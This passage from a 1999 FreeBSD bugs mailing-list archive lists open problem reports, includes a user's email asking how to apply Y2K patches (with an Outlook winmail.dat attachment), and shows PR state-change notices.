docs/14677 chris listing of (48) utilities in /bin:/sbin:/ o [1999/11/03] docs/14682 doc lprm(1) unaware of lp(1) Environment Vari o [1999/11/03] ports/14686 ports New port: pisces IIB (Category: cad) o [1999/11/03] bin/14697 grog Exploitable buffer overflow in Vinum (Fre o [1999/11/03] ports/14700 mharo libmikmod upgrade o [1999/11/03] ports/14701 ports New Port o [1999/11/04] ports/14705 ports [NEW PORTS] ports of xls2xml converter an o [1999/11/04] misc/14706 jkh sysinstall coredumps o [1999/11/04] conf/14714 Need support for imap4 and pop3 in /etc/p o [1999/11/04] ports/14716 ports This is a port of a Swedish dictionary to o [1999/11/06] ports/14741 ports A summary of the old ispell-language-file o [1999/11/06] ports/14743 ports tcl/e package install hangs sysinstall wi o [1999/11/06] ports/14744 ports tksetathome hangs sysinstall due to lack o [1999/11/06] ports/14745 ports local package fails to install o [1999/11/06] misc/14746 xf86config shell script leaves arrow keys o [1999/11/06] misc/14747 jkh can't install docs 'cause lynx isn't ther o [1999/11/07] ports/14759 ports Many minor port clean-ups o [1999/11/07] ports/14760 asami bsd.port.mk: Speed-up for clean-depends o [1999/11/07] ports/14761 ports More minor port clean-ups o [1999/11/07] ports/14771 ports sslwrap - a new port o [1999/11/07] kern/14778 sio.c doesn't recognize USR model 3090 IS o [1999/11/08] ports/14783 ports mgetty 1.1.12 always sets clocal o [1999/11/08] bin/14786 tail breaks on large files o [1999/11/08] conf/14791 Optionally change the behaviour of fsck u o [1999/11/08] i386/14793 more fdisk partition types o [1999/11/08] misc/14795 jkh Core Dump of /stand/sysinstall o [1999/11/09] ports/14798 ache ports/comms/rzsz no longer compiles becau o [1999/11/09] i386/14800 FreeBSD BootMgr not configurable (or at l o [1999/11/10] conf/14810 [PATCH] initialising multiple interfaces o [1999/11/10] i386/14816 lnc(4) can work with Am79C937 a [1999/11/10] bin/14817 strptime(3) '%C' conversion incorrect a [1999/11/10] ports/14820 torstenb New version of postfix o [1999/11/11] ports/14822 jfitz majordomo sets group-writable dir's o [1999/11/11] ports/14824 wosch no '\0' at the end of buffer o [1999/11/11] bin/14829 rc.shutdown is handled unconsistently by o [1999/11/11] ports/14833 jraynard update port: sfio o [1999/11/11] ports/14838 ache New Speak Freely has been released o [1999/11/12] kern/14839 RELENG_2_2 boot kernel is large size prob o [1999/11/12] kern/14840 Opti930 doesn't work. o [1999/11/12] kern/14841 adrian IEEE 802 encapsulation for arp on etherne o [1999/11/12] bin/14842 PAM's pam_unix.so does not load libcrypt. o [1999/11/12] ports/14854 peter port comms/conserver partially ignores ${ o [1999/11/12] ports/14855 ports [NEW PORT] hns (Hyper NIKKI System) f [1999/11/13] ports/14859 ports OpenSSH has no support for the login clas o [1999/11/13] conf/14864 I can not get dual Boot to boot FreeBSD f o [1999/11/13] ports/14866 ports Upgrade FP Exts to FrontPage 2000 Exts. o [1999/11/14] misc/14868 Freebsd 3.2-REL with 1 ISA PNP and 1 PCI o [1999/11/14] ports/14869 ports New FreeBSD port for jesred-1.2.pl1 o [1999/11/14] ports/14870 ports port submission: lc-1.0 f [1999/11/14] misc/14873 grog corrupted file attachments when mail pass o [1999/11/14] ports/14874 ports Eterm 0.8.10 was released o [1999/11/14] ports/14879 ports New port: lang/starlogo o [1999/11/14] ports/14889 ports [PATCH] dynamic loading for WINE port o [1999/11/14] i386/14891 New smbus driver lmsmb o [1999/11/14] ports/14894 ports comm/kermit some fixed patch o [1999/11/15] ports/14904 jmz Update port: graphics/png to 1.0.5 o [1999/11/15] ports/14906 nakai Update devel/glade to 0.5.5 o [1999/11/15] bin/14911 Install of opiekey missing links to otp-m o [1999/11/15] ports/14915 ports Update port: net/generic-nqs o [1999/11/16] ports/14922 ports Want to contribute new package/port o [1999/11/16] ports/14924 markm p5-Apache-Radius with mod_perl broken on o [1999/11/16] bin/14925 getsubopt isn't poisonous enough o [1999/11/16] conf/14931 rc logging facility o [1999/11/16] ports/14933 imp Simple patch to log password attempts on o [1999/11/17] ports/14945 ports [NEW PORT] gtkdiff - the diff(1) front-en o [1999/11/17] docs/14952 doc Missing man page (terminfo(5)) mentioned o [1999/11/17] bin/14954 search.h is missing o [1999/11/17] ports/14956 ports new port: www/screem o [1999/11/17] ports/14957 ports gtk12 requires Cronyx fonts for Russian l o [1999/11/17] ports/14963 ports update for current sox port to include GS o [1999/11/17] ports/14965 wosch stat port doesn't know fifo file type o [1999/11/17] kern/14968 Convert resource_head and resource.r_link o [1999/11/17] ports/14970 peter conserver-7.4 port submission o [1999/11/17] ports/14971 ports mkcmd-8.10 port submission o [1999/11/17] ports/14972 ports msrc0-0.6 port submission o [1999/11/18] conf/14973 Digi-multiport serial card? o [1999/11/18] conf/14974 In RELENG_3, fdisk reports sizes incorrec o [1999/11/18] ports/14977 peter conserver doesn't support speed over than f [1999/11/18] ports/14983 green OpenSSH, support for login.conf o [1999/11/18] ports/14986 ports possible bug in ssh1 o [1999/11/18] kern/14990 cg new-pcm caveats o [1999/11/18] ports/14991 ports Tcl Data transformations (Tcl-Trf) port o [1999/11/19] misc/14993 Freebsd Locks up when trying to set the h o [1999/11/19] ports/14994 ports [ports upgrade] chinese/pine4 from 4.20 t o [1999/11/19] misc/14999 ache ISO8859-5 locale missing from RELENG_3 o [1999/11/19] misc/15000 ftp(1) needs to send HTTP/1.1 Host: heade o [1999/11/20] ports/15008 jfieber textproc/jade port broken under -current o [1999/11/20] conf/15010 "client" firewall configuration kills inc o [1999/11/21] ports/15016 ports New Port: lang/yabasic o [1999/11/21] ports/15021 ports some port installs fail for non-root user o [1999/11/21] kern/15022 mjacob Suggestion for enhancement: move isp firm o [1999/11/21] ports/15024 ports new port: sysutils/detach o [1999/11/21] ports/15027 ports libmcrypt's distfiles should be updated o [1999/11/21] ports/15030 ports New patch, i3dren o [1999/11/21] ports/15031 ports new port editors/auctex o [1999/11/21] ports/15034 andreas update postgresql port to 6.5.3 o [1999/11/21] ports/15035 jseger [Tcl/Tk] apply plus patch to Tcl/Tk8.2 o [1999/11/21] conf/15038 In sysinstall, easy to not notice that se o [1999/11/22] ports/15042 kris linux-realplayer gives wrong information o [1999/11/22] bin/15048 tcopy reports incorrect values o [1999/11/22] bin/15056 gethostbyname complains about SIG RR:s o [1999/11/23] ports/15064 ports New port submittal o [1999/11/23] kern/15065 fsck can't fix "huge" zero length files o [1999/11/23] misc/15066 ``allscreens_flags'' in rc.conf not docum o [1999/11/25] gnu/15091 add -I option to gnu groff and gnu soelim o [1999/11/25] ports/15093 ports ass man pages to net/dnsutl o [1999/11/25] ports/15094 imura Updated port to ftp/downloader to version o [1999/11/25] kern/15095 TCP's advertised window is not scaled imm o [1999/11/26] ports/15102 markm pgp5 port is broken under -CURRENT o [1999/11/26] ports/15108 jmz The print/latex port is thrashing the dis o [1999/11/27] i386/15119 pcm sound driver dma problems with isa-pn o [1999/11/27] ports/15126 jedgar New port: databases/pxtools o [1999/11/27] misc/15127 _T is defined in ctype.h and breaks c++ l o [1999/11/27] ports/15128 dirk Php4 beta 3 o [1999/11/27] ports/15130 ports update port: www/hypermail o [1999/11/28] ports/15131 ports new port: devel/kpp o [1999/11/28] ports/15134 ports new port: www/kdreamsite o [1999/11/28] ports/15135 ports new port: devel/cervisia o [1999/11/28] ports/15138 jedgar New port: deskutils/yank o [1999/11/28] ports/15141 ports update games/gracer to 0.1.4 o [1999/11/28] ports/15142 jmz Added DIST_SUBDIR to print/tex port o [1999/11/28] ports/15143 ports update to freetds port (new release) o [1999/11/28] ports/15144 ports New port for hevea o [1999/11/28] ports/15146 ports New port submition emulator/truereality, o [1999/11/28] ports/15147 ports New port: audio/xsidplay o [1999/11/28] ports/15148 ports Update port: graphics/gimp1-i18n o [1999/11/28] ports/15152 ports new port cd-console o [1999/11/28] ports/15154 ports update the p5-SQL-Statement port to versi o [1999/11/28] ports/15155 mph update of p5-ReadLine-Perl to version 0.9 o [1999/11/28] ports/15156 ache update of p5-URI to version 1.04 o [1999/11/28] ports/15159 ports new port: games/blackpenguin o [1999/11/28] ports/15160 ports new port: games/ksnes9x o [1999/11/29] ports/15166 ports update udmsearch port to 2.2.1 o [1999/11/29] misc/15168 Adding tracklist support to fdformat o [1999/11/29] ports/15170 ports Update Port: leafnode+ o [1999/11/29] ports/15173 ports Update Etherboot 4.2.11 o [1999/11/29] kern/15175 tcp_input() fails to update m->m_pkthdr.l o [1999/11/29] ports/15176 jedgar Update port: databases/p5-Mysql o [1999/11/30] ports/15180 ports New audio port submission: soundtracker o [1999/11/30] bin/15182 "* Wed-1 event" in calendar produces "31 o [1999/11/30] ports/15188 ports [PATCH] ports/mail/p5-IMAP-Admin upgrade o [1999/11/30] ports/15192 ports Ident2 Daemon o [1999/11/30] misc/15196 shutdown -h no longer synching disks, thu o [1999/12/01] ports/15203 ports New FreeBSD port: p5-Term-ANSIColor o [1999/12/01] misc/15205 Addition to /usr/games/random o [1999/12/01] bin/15211 CFLAGS and CC not settable and one warnin o [1999/12/01] misc/15215 Outputting in Fortune under certain circu o [1999/12/02] i386/15218 kernel says: raw partition size != slice o [1999/12/02] kern/15221 marcel Linux emulator core dumps on setreuid() o [1999/12/02] ports/15223 ports Update port: audio/mpeg-lib o [1999/12/02] ports/15226 ports Update port: misc/amanda o [1999/12/02] bin/15227 sheldonh New option for vacation(1) -- dir to use o [1999/12/02] bin/15229 joe mtree - different from mtree in NetBSD 1. o [1999/12/02] docs/15234 mpp sh(1) man page have capitalised instance o [1999/12/03] ports/15237 ports update: ports/misc/fd (followup source di o [1999/12/03] ports/15239 asami fix MASTER_SITE_GNOME in bsd.port.mk: mi o [1999/12/03] ports/15240 nakai [PATCH] update xfce port to the 3.2.1 ver o [1999/12/03] ports/15242 ports Update port: japanese/grep o [1999/12/03] ports/15244 ports Update port: japanese/gxditview o [1999/12/03] ports/15246 ports New port: irc/gtk-bitchx o [1999/12/03] ports/15250 ports MC fail to show contents of ZIP archives o [1999/12/04] kern/15251 patch to add unsigned support to sysctl o [1999/12/04] ports/15252 ports small fix to remove setuid proposal + mas o [1999/12/04] ports/15253 ports update nqc port to 2.0.2 o [1999/12/04] ports/15258 ports New port: misc/party o [1999/12/04] docs/15259 obrien amd(8) refers to nonexistent automount(8) o [1999/12/04] ports/15260 ports New port: games/cursive o [1999/12/04] ports/15261 jedgar Update port: graphics/kplot3d o [1999/12/04] ports/15263 ports [PATCH] Updates for devel/freelibiberty o [1999/12/04] ports/15264 ports New port: sysutils/orville-write o [1999/12/04] ports/15266 ports UPDATE: ports/www/tidy to Nov 30 version o [1999/12/05] kern/15280 kernel panic during FreeBSD install o [1999/12/05] ports/15282 ports unfetchable MASTER_SITES change: archiver o [1999/12/05] ports/15284 ache error installing bash2 from ports on 3.3- o [1999/12/05] bin/15285 unhelpful error message from brandelf o [1999/12/05] misc/15288 billf pkg_version -c output isn't safe for scri o [1999/12/05] ports/15294 jfitz Update port: mrgt from 2.8.8 to 2.8.9 o [1999/12/05] ports/15295 ports Update port: rrdtool from version 1.0.7 t o [1999/12/05] kern/15299 One more videocard (NVidia Vanta) o [1999/12/06] docs/15300 doc assorted update for FAQ o [1999/12/06] bin/15301 Bug in /usr/sbin/syslogd: strips 8th bits o [1999/12/06] misc/15304 billf proposed modifications to pkg_version o [1999/12/06] ports/15307 ports Port for pstotext o [1999/12/06] ports/15313 ports Persuade graphics/gd to build shared libr o [1999/12/06] ports/15315 ports Xfstt may thrash the drive. o [1999/12/06] ports/15316 ports Can not install ssh2 o [1999/12/06] bin/15318 ifconfig dumps core o [1999/12/06] ports/15319 ports Mailcrypt upgrade from 3.4 to 3.5.5 o [1999/12/06] ports/15320 jedgar Update port: graphics/gtkgraph s [1999/12/06] ports/15321 cpiazza Update port: textproc/freegrep o [1999/12/06] ports/15322 jedgar Update port: textproc/code2html o [1999/12/06] ports/15324 ports Update port: graphics/enfle o [1999/12/06] bin/15325 mpp nroff -man bombs out with more than eight o [1999/12/06] ports/15326 ache tcsh modification o [1999/12/07] ports/15329 cwt amanda24 modification o [1999/12/07] ports/15330 ports editor joe modification o [1999/12/07] ports/15334 ports Update port: audio/gsm o [1999/12/07] ports/15335 ports Update port: graphics/dore o [1999/12/07] ports/15336 ports Update port: graphics/epstool o [1999/12/07] ports/15338 jedgar New port: graphics/pngcrush o [1999/12/07] misc/15339 fdformat should exit non-zero when user c o [1999/12/07] ports/15341 ports XF86Setup in CURRENT is broken on possibl o [1999/12/07] bin/15342 replacement for the stock /sbin/dhclient- o [1999/12/07] ports/15343 ports Port update: net/icqlib o [1999/12/07] ports/15344 ports Port update: net/kicq o [1999/12/07] ports/15347 ports [New Ports] Xatm o [1999/12/08] ports/15354 jedgar Update port: security/portsentry o [1999/12/08] ports/15355 ports [PATCH] New version 2.4 of WmakerConf (x1 o [1999/12/08] ports/15359 ports Update port: russian/apache13 o [1999/12/08] ports/15360 ports new port = logcheck o [1999/12/08] ports/15362 obrien mutt core dumps as soon as a key is press o [1999/12/08] ports/15366 ports Update: japanese/libslang o [1999/12/08] ports/15367 ports new ports on linux emulator o [1999/12/09] bin/15371 keyinfo doesn't work without suidperl o [1999/12/09] ports/15372 ports ja-platex2e ports are too obsolete o [1999/12/09] ports/15378 ports Update port: audio/maplay o [1999/12/09] ports/15387 billf ethereal's packet-smb.c calls str*() func o [1999/12/09] bin/15390 obrien Upgrade rdist to 6.1.5 o [1999/12/10] ports/15394 ports new port: japanese/kanji18, kanji26, ngra o [1999/12/10] ports/15397 ports port lang/elk: CC not settable. o [1999/12/10] ports/15401 ports Update ports: XEmacs-21.1.8 o [1999/12/10] ports/15402 ports Update port: games/xshisen o [1999/12/10] ports/15407 ports New Port: graphics/chbg o [1999/12/10] docs/15408 doc Description of ls and nlist wrong in man o [1999/12/10] ports/15409 ports [PATCH] net/tik shell script to launch `` o [1999/12/10] bin/15410 edquota -p copies current usage as well a o [1999/12/10] misc/15411 anoncvs does not work: /ctm/FreeBSD/anonc o [1999/12/10] ports/15412 wes new port: shells/perlsh o [1999/12/10] ports/15413 wes new port: shells/flash o [1999/12/11] ports/15415 ports port games/xqf: update to 0.9.1 o [1999/12/11] bin/15416 addr2line is unable to find line numbers o [1999/12/11] bin/15418 tput(1) doesn't work with new libncurses. o [1999/12/11] misc/15421 initgroups(3) spits out messages to stder o [1999/12/11] conf/15422 wpaul /boot/defaults/loader.conf references old o [1999/12/11] ports/15423 ports update mail/nmh port to nmh-1.0.2 o [1999/12/11] ports/15424 ports new port: www/kwebsearch o [1999/12/11] kern/15425 marcel statfs and fstatfs syscall in linux emula o [1999/12/11] ports/15428 ports update port: astro/xearth 1.0 -> 1.1 o [1999/12/11] docs/15429 doc Jewish calendar is out of date o [1999/12/11] ports/15430 jmz xloadimage tiles only verticaly if -tile o [1999/12/11] ports/15431 ports New port: games/baduki o [1999/12/11] ports/15432 ports fix devel/t1lib packaging error o [1999/12/11] ports/15433 ports Small update to flexbackup port. Maintain o [1999/12/12] ports/15434 ports new port: devel/kdevelop o [1999/12/12] kern/15435 Attempts to execute programs from a noexe o [1999/12/12] kern/15436 syscons extension: "propellers" o [1999/12/12] kern/15440 jasone support atomic locks in the UP kernel o [1999/12/12] ports/15443 ports Updated port: devel/t1lib from 0.9.2 to 1 o [1999/12/12] ports/15444 ports Updated port: graphics/xpdf due to pendin o [1999/12/12] kern/15448 Would be nice if the kernel could detect/ o [1999/12/12] ports/15453 ports Update FreeTDS from 0.47pre2 to 0.50 o [1999/12/12] kern/15455 dg Intel EtherExpress Pro does not properly o [1999/12/13] bin/15456 Usage of ktrace(1) is invalid o [1999/12/13] bin/15458 sort(1) doesn't sort correctly in some ca o [1999/12/13] ports/15459 ports news/cnews for for gawk o [1999/12/13] ports/15461 jmacd Update of misc/xdelta port o [1999/12/13] ports/15462 ports New port: cad/cider o [1999/12/13] ports/15465 ports Update port: cad/xcircuit to 2.0b1 o [1999/12/13] ports/15466 ports Update port: devel/gide to 0.1.6 o [1999/12/13] ports/15467 ports Update port: graphics/tiff o [1999/12/13] ports/15468 ports Update port: math/blas o [1999/12/13] ports/15469 ports New port: nethack-3.3.0 o [1999/12/13] bin/15470 Proposed change to comments in /etc/named o [1999/12/13] ports/15473 ports port lang/squeak2: CC not settable. o [1999/12/13] misc/15474 time server entry in /etc/services on fre o [1999/12/14] ports/15477 ports wwwstat-2.01 port is not Y2K compliant: 1 o [1999/12/14] ports/15479 ports Ports update of syncal to version 0.8.3 o [1999/12/14] misc/15480 Change-request for /usr/src/usr.sbin/cdco o [1999/12/14] ports/15481 ports ports/devel/codecrusader slightly broken o [1999/12/14] ports/15482 jedgar Update port: news/pan o [1999/12/14] i386/15488 Incorrect FPE_*_TRAP macros in machine/tr o [1999/12/14] kern/15489 running fstat causes a bus error o [1999/12/15] kern/15492 Patch to fixup bridging support for 2.2-S o [1999/12/15] kern/15493 Patch to enable bridging support for if_c o [1999/12/15] ports/15495 asami Add "addsum" target to bsd.port.mk o [1999/12/15] bin/15496 killall(1) limited to 16 character proces o [1999/12/15] bin/15497 NIS does not deal well with comments o [1999/12/15] ports/15498 ports Update port: archivers/lzo o [1999/12/15] ports/15499 ports Update port: math/eispack o [1999/12/15] ports/15500 ports Update port: math/linpack o [1999/12/15] ports/15501 ports Update port: math/superlu to 2.0 o [1999/12/15] ports/15502 ports Update port: math/umfpack to 2.2.1 o [1999/12/15] ports/15503 ports GNOME updates o [1999/12/15] ports/15504 ports Update textproc/aspell o [1999/12/15] ports/15505 chuckr Update math/gnuplot o [1999/12/15] ports/15506 ports Update x11-toolkits/gtk-engines o [1999/12/15] ports/15507 ports new port: devel/robodoc o [1999/12/15] ports/15509 ports New port: p5-Chart-PNGgraph o [1999/12/15] bin/15510 df(1) does not lineup with large filesyst o [1999/12/15] kern/15511 Cannot scroll up after panic? o [1999/12/15] kern/15512 sos ATA driver bug for CD drives that don't r o [1999/12/16] ports/15514 ports /usr/ports/devel/t1lib hangs in configure o [1999/12/16] ports/15516 ache rsaref distfile location changed o [1999/12/16] ports/15517 ports Port of newly released game nethack 3.3.0 o [1999/12/16] misc/15519 Lots of bind-8.2.2 manual pages don't get o [1999/12/16] ports/15522 ports Wrong Maintainer E-Mail in hp2xx and tclo o [1999/12/16] ports/15525 ports macro AM_GNU_GETTEXT will not make use of o [1999/12/16] ports/15526 ports [NEW PORT] security/pgpgpg: a wrapper for o [1999/12/17] ports/15527 ports www/mathopd upgrade: 1.3 => 1.3pl2 o [1999/12/17] i386/15528 doscmd exec function fail. o [1999/12/17] ports/15530 jedgar new port: irc/nethirc o [1999/12/17] i386/15531 doscmd DOS function 0a fail when DL is 0 o [1999/12/17] kern/15532 Reboot just to kill a print job? o [1999/12/17] ports/15533 ports Update port: devel/asl to 1.41r8 o [1999/12/17] ports/15534 ports Update port: devel/dmake o [1999/12/17] ports/15535 ports Update port: devel/flick to 2.1 o [1999/12/17] ports/15536 ports Update port: devel/picprog o [1999/12/17] ports/15537 ports Update port: x11/sxpc o [1999/12/17] ports/15538 ports Update port: x11/wmmatrix o [1999/12/17] ports/15539 ports Update port: x11/xbanner o [1999/12/17] ports/15544 torstenb Postfix port should be updated from pl02 o [1999/12/17] ports/15545 ports new port: x11/xterm o [1999/12/17] misc/15546 Need to enable LBA flag for large IDE dis o [1999/12/17] i386/15547 discmd function 51 ( get ps ) fail o [1999/12/18] gnu/15549 obrien Fix -fformat-extensions support code merg o [1999/12/18] ports/15550 billf Please update www/calamaris o [1999/12/18] ports/15552 ports new port (knode) o [1999/12/18] misc/15555 some enhancements for uudecode o [1999/12/18] ports/15556 ports Additional patches for www/w3m o [1999/12/19] ports/15558 ports /usr/ports/x11/gnomelibs fails to compile o [1999/12/19] ports/15559 ports update astro/soaimage to 1.26 o [1999/12/19] ports/15560 ports update port to 0.2 o [1999/12/19] bin/15561 doc regex(3) manpage needs update o [1999/12/19] ports/15562 ports update of ports/textproc/X2html to versio o [1999/12/19] ports/15563 ports Updating the lang/librep port o [1999/12/19] ports/15564 ports update port to 2.4 o [1999/12/19] misc/15565 ports x11-toolkits/rep-gtk updated o [1999/12/19] ports/15566 ports x11-wm/sawmill update o [1999/12/19] ports/15567 ports update games/bs to 2.2 (from 2.1) o [1999/12/19] ports/15568 ports Please update sysutils/ascpu to 1.8 o [1999/12/19] ports/15569 ports Small fix for net/xferstats o [1999/12/19] ports/15570 ports Please update net/p5-Net-RawIP o [1999/12/19] ports/15572 ports Update benchmars/polygraph to the current o [1999/12/19] ports/15573 ports Fix for devel/gaa distfiles o [1999/12/19] ports/15574 ports Fix for net/ggsd mastersites o [1999/12/19] ports/15575 ports Bugfix of port: net/dante o [1999/12/19] ports/15576 ports Update www/amaya to 2.4 o [1999/12/20] bin/15582 userland ppp dialup fail with AtermIT o [1999/12/20] ports/15583 ports Update port: lang/cim to 3.33 o [1999/12/20] ports/15584 ports Update port: lang/forth o [1999/12/20] ports/15585 ports Update port: x11-clocks/bclock o [1999/12/20] ports/15586 ports Update port: x11-clocks/dclock to pl6 o [1999/12/20] ports/15587 ports Update port: x11-clocks/t3d o [1999/12/20] ports/15588 ports Update port: x11/sxpc o [1999/12/20] ports/15589 ports update games/netris to 0.5 o [1999/12/20] ports/15590 ports Update: lang/ruby o [1999/12/20] ports/15591 ports Update: x11-toolkits/rubytk o [1999/12/20] ports/15592 ports Update: japanese/rubytk o [1999/12/20] bin/15593 [SECURITY] ustrcpy() buffer overflow in d 1472 problems total. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 14:25: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from hopper.isi.com (hopper.isi.com [192.73.222.1]) by hub.freebsd.org (Postfix) with ESMTP id 36CAC1538F for ; Mon, 20 Dec 1999 14:25:01 -0800 (PST) (envelope-from FSafi@isi.com) Received: from karma.isi.com (pixsv176.isi.com [192.73.222.126]) by hopper.isi.com (8.8.4/8.6.10) with ESMTP id OAA29673 for ; Mon, 20 Dec 1999 14:24:53 -0800 (PST) Received: from y2kpc10 (y2kpc10 [192.216.227.64]) by karma.isi.com (Pro-8.9.3/Pro-8.9.3/Mailout 991117 TroyC) with SMTP id OAA12288 for ; Mon, 20 Dec 1999 14:20:39 -0800 (PST) Reply-To: From: "Farhat Safi" To: Subject: Help Date: Mon, 20 Dec 1999 14:25:04 -0800 Message-ID: <006701bf4b39$107782b0$40e3d8c0@isi.com> MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="----=_NextPart_000_0068_01BF4AF6.025442B0" X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.00.2314.1300 X-MS-TNEF-Correlator: 00000000392FCEC9A667D311B0370050049D6B7A44CC2000 Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org This is a multi-part message in MIME format. ------=_NextPart_000_0068_01BF4AF6.025442B0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit Hello, I have a freeBSD version 2.2.1 and need to make it Y2K compliant. I have visited the website and found out that there are some patches available for it. But what I need help with is on how to download these patches and apply them. Can you please help me, may be some instructions or anything will help. Best Regards ------=_NextPart_000_0068_01BF4AF6.025442B0 Content-Type: application/ms-tnef; name="winmail.dat" Content-Transfer-Encoding: base64 Content-Disposition: attachment; filename="winmail.dat" eJ8+IgUWAQaQCAAEAAAAAAABAAEAAQeQBgAIAAAA5AQAAAAAAADoAAEIgAcAGAAAAElQTS5NaWNy b3NvZnQgTWFpbC5Ob3RlADEIAQ2ABAACAAAAAgACAAEGgAMADgAAAM8HDAAUAA4AGQAAAAEAHgEB A5AGAPwFAAAnAAAACwACAAEAAAALACMAAAAAAAMAJgAAAAAACwApAAAAAAADADYAAAAAAB4AcAAB AAAABQAAAEhlbHAAAAAAAgFxAAEAAAAWAAAAAb9LOQ2Q8Zia/rGMEdOwewBQBJ1regAAAgEdDAEA AAATAAAAU01UUDpGU0FGSUBJU0kuQ09NAAALAAEOAAAAAEAABg4ABmsNOUu/AQIBCg4BAAAAGAAA AAAAAAA5L87JpmfTEbA3AFAEnWt6woAAAAsAHw4BAAAAAwAGEBdWWCkDAAcQAAEAAB4ACBABAAAA ZQAAAEhFTExPLElIQVZFQUZSRUVCU0RWRVJTSU9OMjIxQU5ETkVFRFRPTUFLRUlUWTJLQ09NUExJ QU5USUhBVkVWSVNJVEVEVEhFV0VCU0lURUFOREZPVU5ET1VUVEhBVFRIRVJFQVIAAAAAAgEJEAEA AACEAQAAgAEAANYBAABMWkZ150wwZwMACgByY3BnMTI1FjIA+Atgbg4QMDMzTwH3AqQD4wIAY2gK wHOwZXQwIAcTAoB9CoGSdgiQd2sLgGQ0DGAOYwBQCwMLtSBIZWydCQAsCqIKhAqASSAQ8GB2ZSBh IANQCeBCWFNEIBUwERBpAiAgNDIuFoAxFVASgCBuowngFwB0byAAwGsVQEJpBUBZMksgBaBt5wtQ BzACMC4gFPUSIACQinQXQmgVQHdlYhmiexbTAhB1FvEIYAVAGgBh7xuCBJAVQRwhcwNwFUAKsP50 EOAHkRUgC3ALYAJgFUCvAhAFwBfwGPBCG3F3G7JnFPAXIxoQbHAaMBfwaGcX4AQgFlFobwfgF3Fk 9SCQbgkAYRnjESAc2BbxVGFwC1B5GfJtGPBD3QOReQhgHNAd0GEhsR+DbQeALBeRIuBiHHULgHP0 dHISwHQWQSAxBcAAcHZ5GgALgGcfwRPwH3MuGxQ6FDRCB5AFQFJlZy8LERCwFEMR4QAqUAMAEBAA AAAAAwAREAAAAAALAAGACCAGAAAAAADAAAAAAAAARgAAAAADhQAAAAAAAAMAA4AIIAYAAAAAAMAA AAAAAABGAAAAABCFAAAAAAAAAwAHgAggBgAAAAAAwAAAAAAAAEYAAAAAUoUAAPATAAAeAAiACCAG AAAAAADAAAAAAAAARgAAAABUhQAAAQAAAAQAAAA4LjUACwAMgAggBgAAAAAAwAAAAAAAAEYAAAAA BoUAAAAAAAADAA2ACCAGAAAAAADAAAAAAAAARgAAAAABhQAAAAAAAAsAFoAIIAYAAAAAAMAAAAAA AABGAAAAAA6FAAAAAAAAAwAXgAggBgAAAAAAwAAAAAAAAEYAAAAAEYUAAAAAAAADABmACCAGAAAA AADAAAAAAAAARgAAAAAYhQAAAAAAAB4AKIAIIAYAAAAAAMAAAAAAAABGAAAAADaFAAABAAAAAQAA AAAAAAAeACmACCAGAAAAAADAAAAAAAAARgAAAAA3hQAAAQAAAAEAAAAAAAAAHgAqgAggBgAAAAAA wAAAAAAAAEYAAAAAOIUAAAEAAAABAAAAAAAAAAsAMoAIIAYAAAAAAMAAAAAAAABGAAAAAIKFAAAB AAAACwA0gAsgBgAAAAAAwAAAAAAAAEYAAAAAAIgAAAAAAAALADaACyAGAAAAAADAAAAAAAAARgAA AAAFiAAAAAAAAAIB+A8BAAAAEAAAADkvzsmmZ9MRsDcAUASda3oCAfoPAQAAABAAAAA5L87JpmfT EbA3AFAEnWt6AgH7DwEAAACAAAAAAAAAADihuxAF5RAaobsIACsqVsIAAFBTVFBSWC5ETEwAAAAA AAAAAE5JVEH5v7gBAKoAN9luAAAAQzpcV0lOTlRcUHJvZmlsZXNcZnNhZmlcQXBwbGljYXRpb24g RGF0YVxNaWNyb3NvZnRcT3V0bG9va1xvdXRsb29rLnBzdAADAP4PBQAAAAMADTT9NwAAAgF/AAEA AAAxAAAAMDAwMDAwMDAzOTJGQ0VDOUE2NjdEMzExQjAzNzAwNTAwNDlENkI3QTQ0Q0MyMDAwAAAA AGkh ------=_NextPart_000_0068_01BF4AF6.025442B0-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 14:44:54 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id AED9515276; Mon, 20 Dec 1999 14:44:53 -0800 (PST) (envelope-from brian@FreeBSD.org) Received: (from brian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA71128; Mon, 20 Dec 1999 14:44:53 -0800 (PST) (envelope-from brian@FreeBSD.org) Date: Mon, 20 Dec 1999 14:44:53 -0800 (PST) From: Message-Id: <199912202244.OAA71128@freefall.freebsd.org> To: kjwolf@solling.seismic.de, brian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/15551: Userland PPP (Client): Timeout not always recognized Sender: owner-freebsd-bugs@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Synopsis: Userland PPP (Client): Timeout not always recognized State-Changed-From-To: open->feedback State-Changed-By: brian State-Changed-When: Mon Dec 20 14:43:09 PST 1999 State-Changed-Why: The submitter needs to provide more information. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message From owner-freebsd-bugs Mon Dec 20 14:46: 3 1999 Delivered-To: freebsd-bugs@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.ORG [204.216.27.21]) by hub.freebsd.org (Postfix) with ESMTP id 0C1EA1535F; Mon, 20 Dec 1999 14:46:01 -0800 (PST) (envelope-from brian@FreeBSD.org) Received: (from brian@localhost) by freefall.freebsd.org (8.9.3/8.9.2) id OAA71354; Mon, 20 Dec 1999 14:46:00 -0800 (PST) (envelope-from brian@FreeBSD.org) Date: Mon, 20 Dec 1999 14:46:00 -0800 (PST) From: Message-Id: <199912202246.OAA71354@freefall.freebsd.org> To: poortom@apmisc.ibm.co.jp, brian@FreeBSD.org, freebsd-bugs@FreeBSD.org Subject: Re: bin/15582: userland ppp dialup fail with AtermIT Sender: 